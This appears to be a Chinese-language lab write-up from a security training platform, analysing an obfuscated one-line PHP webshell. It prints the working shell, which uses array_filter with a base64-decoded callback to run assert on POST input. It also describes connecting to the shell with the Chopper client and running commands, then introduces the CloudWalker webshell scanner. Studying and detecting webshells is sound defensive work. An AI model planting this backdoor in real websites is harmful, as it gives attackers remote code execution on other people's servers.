WebShell代碼分析溯源(五)

WebShell代碼分析溯源(五)php

1、一句話變形馬樣本git

<?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?>github

2、代碼分析web

一、調整代碼格式shell

  

二、分析代碼數組

首先使用REQUEST方法接收url中e參數傳遞的值,而後把$_POST['POST']賦值給arr數組,而後把arr數組中的每一個鍵值傳給base64_decode函數,最終構成一句話木馬assert($_post['post'])函數

注: array_filter() 函數用回調函數過濾數組中的值 工具

3、漏洞環境搭建post

一、這裏使用在線學習平臺墨者學院中的實驗環境(WebShell代碼分析溯源(第4題)),地址: https://www.mozhe.cn/bug/detail/ZVNlS096cEV0WHZsTzdKNHBKZXljUT09bW96aGUmozhe學習

二、代碼環境,下載代碼

  

三、分析(上面已經分析過了)

四、使用菜刀鏈接

   

五、執行一些命令

  

 

   

4、後記

學習經常使用webshell掃描檢測查殺工具---牧雲(CloudWalker)(百度WebShell掃描檢測引擎),網址: https://github.com/chaitin/cloudwalker

使用牧雲進行webshell查殺

一、經過命令檢測

  

 

二、輸出檢測報告

  

 

   

相關文章
相關標籤/搜索